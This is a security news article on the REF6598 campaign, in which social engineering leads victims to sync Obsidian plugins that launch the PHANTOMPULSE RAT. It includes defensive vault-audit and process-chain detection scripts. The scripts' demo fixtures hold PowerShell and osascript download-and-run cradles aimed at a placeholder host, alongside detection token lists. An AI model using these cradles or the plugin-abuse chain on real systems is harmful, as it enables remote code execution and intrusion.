Obsidian Plugins Abused to Deliver PHANTOMPULSE Malware in Targeted Financial Sector Attacks

CyberSecureFox

A newly documented cyber campaign, tracked as REF6598, is abusing the popular cross‑platform note‑taking application Obsidian to gain a foothold in financial and cryptocurrency organizations. According to Elastic Security Labs, the attackers use social engineering on LinkedIn and Telegram to lure victims into syncing a malicious Obsidian vault, which ultimately delivers a previously unknown Windows remote access trojan (RAT) dubbed PHANTOMPULSE.

Social engineering via LinkedIn and Telegram as the initial attack vector

The operation begins with a highly targeted social engineering approach. Threat actors contact employees of financial institutions, trading firms, or crypto projects on LinkedIn, posing as representatives of venture capital funds or investment companies. Once a rapport is established, the conversation is moved to a Telegram group chat that appears to include additional “partners” and “colleagues.”

In this chat, the attackers discuss liquidity, crypto products, and financial services, creating the impression of a legitimate business opportunity. This aligns with industry reporting such as the Verizon Data Breach Investigations Report, which consistently finds that the majority of breaches involve a human element, often through phishing, social engineering, or misuse of credentials.

Abuse of Obsidian community plugins instead of software vulnerabilities

A key aspect of REF6598 is that it does not rely on an Obsidian vulnerability; it misuses legitimate functionality. Victims are asked to join a shared Obsidian “workspace” or “dashboard” hosted in a cloud-synced vault (Obsidian’s own Sync service), for which the attackers supply the account credentials. After opening the vault, the user is instructed to turn on the Sync option that propagates the Installed community plugins setting.

This manual step is critical: syncing installed community plugins is off by default, and because it is a per-device Sync setting it cannot be switched on from the shared vault itself; only the victim can enable it. Once they do, Obsidian pulls the vault’s configuration files from the shared vault, namely the list of enabled community plugins and each plugin’s own settings file, installs the listed plugins, and applies their configuration.

The attackers abuse two legitimate, publicly listed community plugins: Shell Commands and Hider. Shell Commands runs operator-defined shell commands, either on demand or automatically on plugin events such as Obsidian starting; Hider hides user-interface elements such as scrollbars and the status bar, which helps mask the activity. The harmful logic is simply the command strings stored in the plugin’s settings file under the vault’s .obsidian/plugins/ directory, so there may be no standalone malware file on disk for signature-based antivirus to detect.
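The steps above (shared vault, plugin list synced in, commands carried in a plugin settings file) can be checked for on any vault a user has opened. The following audit script is an added example, not code from the article or from Elastic Security Labs. It reads Obsidian’s standard .obsidian/community-plugins.json to see which community plugins the vault enables and walks every plugin’s .obsidian/plugins/<id>/data.json for interpreter invocations and download-cradle idioms, regardless of the plugin’s JSON schema. The plugin IDs, the token list and the contents of the demo vault are assumptions made for this example.

```python
"""Audit an Obsidian vault's .obsidian/ directory for the REF6598 pattern.

Added example; not code from the article or from Elastic Security Labs.
Standard Obsidian files: .obsidian/community-plugins.json (enabled plugin IDs)
and .obsidian/plugins/<id>/data.json (each plugin's settings). The plugin IDs,
the token list and the demo vault contents are assumptions for this example.
"""
import json
import re
import tempfile
from pathlib import Path

# Assumed to match the plugins' manifest "id" values; verify against manifest.json.
SUSPECT_PLUGINS = {
    "obsidian-shellcommands": "Shell Commands: runs shell commands on configured triggers",
    "obsidian-hider": "Hider: hides UI elements, can mask activity",
}

# Interpreters and download-cradle idioms that have no business in a note vault.
SUSPECT_TOKENS = re.compile(
    r"(powershell|pwsh|osascript|cmd\.exe|/bin/(ba)?sh|curl\s|wget\s|"
    r"Invoke-WebRequest|Invoke-Expression|\biex\b|\biwr\b|DownloadString|"
    r"-enc(odedcommand)?\b|FromBase64String|certutil)",
    re.IGNORECASE,
)


def _walk_strings(node, path="$"):
    """Yield (json_path, value) for every string leaf, whatever the schema."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, dict):
        for key, val in node.items():
            yield from _walk_strings(val, f"{path}.{key}")
    elif isinstance(node, list):
        for i, val in enumerate(node):
            yield from _walk_strings(val, f"{path}[{i}]")


def audit_vault(vault):
    """Return (kind, where, detail) findings for one vault root; [] means clean."""
    cfg = Path(vault) / ".obsidian"
    findings = []

    enabled = []
    plugins_file = cfg / "community-plugins.json"
    if plugins_file.is_file():
        try:
            enabled = json.loads(plugins_file.read_text(encoding="utf-8"))
        except json.JSONDecodeError as exc:
            findings.append(("config", str(plugins_file), f"unparseable: {exc}"))
    for plugin_id in enabled:
        if plugin_id in SUSPECT_PLUGINS:
            findings.append(("plugin", plugin_id, SUSPECT_PLUGINS[plugin_id]))

    plugins_dir = cfg / "plugins"
    if plugins_dir.is_dir():
        for data_file in sorted(plugins_dir.glob("*/data.json")):
            try:
                doc = json.loads(data_file.read_text(encoding="utf-8"))
            except (json.JSONDecodeError, OSError) as exc:
                findings.append(("config", str(data_file), f"unparseable: {exc}"))
                continue
            for json_path, value in _walk_strings(doc):
                if SUSPECT_TOKENS.search(value):
                    where = f"{data_file.parent.name}:{json_path}"
                    findings.append(("command", where, value[:160]))
    return findings


def build_demo_vault(root):
    """Write a constructed vault that mirrors the article's description."""
    cfg = Path(root) / ".obsidian"
    for plugin_id in SUSPECT_PLUGINS:
        (cfg / "plugins" / plugin_id).mkdir(parents=True, exist_ok=True)
    (cfg / "community-plugins.json").write_text(
        json.dumps(["obsidian-hider", "obsidian-shellcommands"]), encoding="utf-8")
    # Shape loosely modelled on the Shell Commands settings file; the exact schema
    # is an assumption, which is why the scanner walks every string regardless.
    shell_cfg = {"shell_commands": [{
        "id": "sync-dashboard",
        "platform_specific_commands": {
            "default": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/p.ps1 | iex"',
            "darwin": "osascript -e 'do shell script \"curl -s https://example.invalid/m | sh\"'",
        },
        "events": {"after-obsidian-starts": {"enabled": True}},
    }]}
    (cfg / "plugins" / "obsidian-shellcommands" / "data.json").write_text(
        json.dumps(shell_cfg), encoding="utf-8")
    (cfg / "plugins" / "obsidian-hider" / "data.json").write_text(
        json.dumps({"hideScrollbars": True, "hideStatusBar": True}), encoding="utf-8")
    return root


def demo_findings():
    """Build the constructed vault in a temp dir and return what the audit finds."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_vault(build_demo_vault(tmp))


if __name__ == "__main__":
    for kind, where, detail in demo_findings():
        print(f"[{kind}] {where}: {detail}")
```

Run it against a real vault with audit_vault("/path/to/vault"); a clean vault returns an empty list. Walking every string leaf rather than a fixed schema is deliberate: it keeps working when the plugin’s settings format changes, and it catches the same cradle strings if a different command-running plugin is substituted.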

PHANTOMPULSE RAT on Windows: Ethereum-based C2 discovery

On Windows systems, the Shell Commands plugin invokes a PowerShell script that downloads and runs an intermediate loader named PHANTOMPULL. This loader decrypts and deploys the core payload in memory: the PHANTOMPULSE remote access trojan, reportedly developed with the help of generative AI tools.

PHANTOMPULSE uses a non‑standard command‑and‑control (C2) mechanism. Instead of hard‑coding server domains, the malware queries the Ethereum blockchain, reading the most recent transaction associated with a wallet address embedded in its code. Data in that transaction points the malware to the current C2 endpoint. Because blockchain data is globally replicated and not easily taken down, this approach complicates traditional domain or IP blocklisting. The embedded wallet address is, however, itself a static indicator: defenders can watch that address for new transactions and learn the next C2 endpoint as soon as the operators publish it, and outbound connections to public Ethereum RPC endpoints from a process that has no reason to talk to a blockchain are a detection opportunity in their own right.

After retrieving the live C2 address, PHANTOMPULSE communicates via WinHTTP, exfiltrating system information and receiving instructions. Its capabilities are typical for a modern RAT: arbitrary command execution, file upload/download, screenshot capture, keylogging, and detailed system reconnaissance. In a financial or crypto context, such access can be used to move funds, steal trading strategies, or compromise back‑office systems.

macOS attack chain: AppleScript dropper and Telegram as a “dead drop”

For macOS targets, the attackers deploy a different toolset. Here, the Shell Commands plugin launches an obfuscated AppleScript‑based dropper. This script cycles through a list of hard‑coded domains to locate the current C2 server.

If these domains are unavailable, the malware falls back to Telegram as a “dead drop” channel, retrieving C2 information from messages or channels under the attackers’ control. This multi‑layer design makes the C2 infrastructure highly flexible and resistant to simple domain blocking.

Once it resolves a working C2 endpoint, the dropper downloads a second‑stage payload and executes it using the osascript command-line tool. Researchers were unable to obtain this final stage, as the C2 infrastructure was offline during analysis and the observed intrusion attempt was blocked before completion.

Security implications for financial and cryptocurrency organizations

REF6598 underscores a broader trend in modern cyber threats: abuse of trusted applications and extensibility features (plugins, macros, API integrations) is increasingly replacing classical exploits. When attackers rely on legitimate functionality, security controls focused solely on known vulnerabilities and static signatures lose effectiveness.

For financial and cryptocurrency organizations, it is advisable to review threat models and acceptable‑use policies around note‑taking and knowledge‑management tools. Concrete measures include:

• Controlling Obsidian and similar tools: restrict or monitor the use of community plugins, implement allowlists of approved extensions, and closely inspect shared vaults or workspaces originating from external parties.

• Monitoring high‑risk scripting engines: enable EDR/XDR rules to flag or block PowerShell, osascript/AppleScript, or other interpreters whose parent process is a productivity app like Obsidian (an Electron application that has no legitimate reason to spawn a shell), a note tool, or a messaging client; a download cradle or encoded command on the interpreter’s command line should raise the severity.

• Strengthening user awareness: train staff to verify the identity of supposed “investors” and “partners” on LinkedIn, be cautious when conversations move to encrypted messengers, and treat requests to log into external workspaces or sync unknown plugins as potential red flags.
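The process‑chain rule described in the monitoring bullet, written out as an added example (not the article’s or Elastic’s code). It walks each process’s ancestry in a batch of process‑creation events, alerts when a scripting interpreter descends from Obsidian or another watched app, and raises the severity when the command line carries a download cradle or encoded command. The event shape, the name lists and the sample events are constructed for this example; map the fields onto your EDR’s telemetry.

```python
"""Process-lineage detection for the REF6598 execution pattern.

Added example, not the article's or Elastic's code. The ProcEvent shape, the
interpreter/parent name lists and SAMPLE_EVENTS are constructed for this example.
"""
from dataclasses import dataclass

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "osascript", "bash", "sh", "zsh"}
# Apps that should never be the ancestor of a shell; Obsidian is Electron-based.
WATCHED_PARENTS = {"obsidian.exe", "obsidian", "telegram.exe", "telegram"}
CRADLE_MARKERS = ("invoke-webrequest", "iwr ", "downloadstring", "invoke-expression",
                  "iex", "-encodedcommand", "-enc ", "frombase64string",
                  "curl ", "wget ", "do shell script")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path as the sensor reports it
    cmdline: str


def image_name(path):
    """Basename, lower-cased, for Windows or POSIX paths on any host."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(event, by_pid):
    """Image names from the process up to the oldest ancestor the sensor saw."""
    chain, seen, cur = [], set(), event
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)              # guards against PID-reuse loops
        chain.append(image_name(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def evaluate(events):
    """Return one alert dict per interpreter that descends from a watched app."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        name = image_name(ev.image)
        if name not in INTERPRETERS:
            continue
        chain = ancestry(ev, by_pid)
        watched = [p for p in chain[1:] if p in WATCHED_PARENTS]
        if not watched:
            continue                   # e.g. a shell under an editor or terminal
        lower = ev.cmdline.lower()
        markers = [m for m in CRADLE_MARKERS if m in lower]
        alerts.append({
            "pid": ev.pid,
            "interpreter": name,
            "spawned_by": watched[0],
            "chain": " <- ".join(chain),
            "markers": markers,
            "severity": "high" if markers else "medium",
        })
    return alerts


# Constructed telemetry: a Windows chain as the article describes (Electron apps
# spawn helper processes, so the shell's direct parent is a child Obsidian.exe),
# a macOS chain, and two benign interpreter launches that must not alert.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Users\u\AppData\Local\Obsidian\Obsidian.exe", "Obsidian.exe"),
    ProcEvent(210, 200, r"C:\Users\u\AppData\Local\Obsidian\Obsidian.exe", "Obsidian.exe --type=renderer"),
    ProcEvent(220, 210, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/p.ps1 | iex"'),
    ProcEvent(300, 100, r"C:\Program Files\Editor\editor.exe", "editor.exe"),
    ProcEvent(310, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Date"),
    ProcEvent(400, 1, "/Applications/Obsidian.app/Contents/MacOS/Obsidian", "Obsidian"),
    ProcEvent(410, 400, "/usr/bin/osascript",
              "osascript -e 'do shell script \"curl -s https://example.invalid/m | sh\"'"),
    ProcEvent(500, 1, "/bin/zsh", "zsh -l"),
]


def demo_alerts():
    return evaluate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for a in demo_alerts():
        print(f"{a['severity']:6} pid={a['pid']} {a['chain']} markers={a['markers']}")
```

Walking the full ancestry rather than checking only the immediate parent matters here: Electron applications run as a tree of processes, so a rule keyed on the direct parent alone can miss the shell when it is spawned from a helper process. Tune WATCHED_PARENTS and INTERPRETERS to the fleet; the two benign events in the sample show the rule staying quiet for shells launched under an editor or a login session.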

Combining behavioral security technologies (EDR/XDR with process‑chain analysis, plugin management, and network monitoring) with continuous education on social engineering makes attacks like REF6598 significantly harder to execute. When employees are less willing to enable untrusted plugins or enter shared credentials into tools like Obsidian at the request of a new “investor,” even sophisticated, blockchain‑enabled malware such as PHANTOMPULSE has far fewer opportunities to gain initial access.
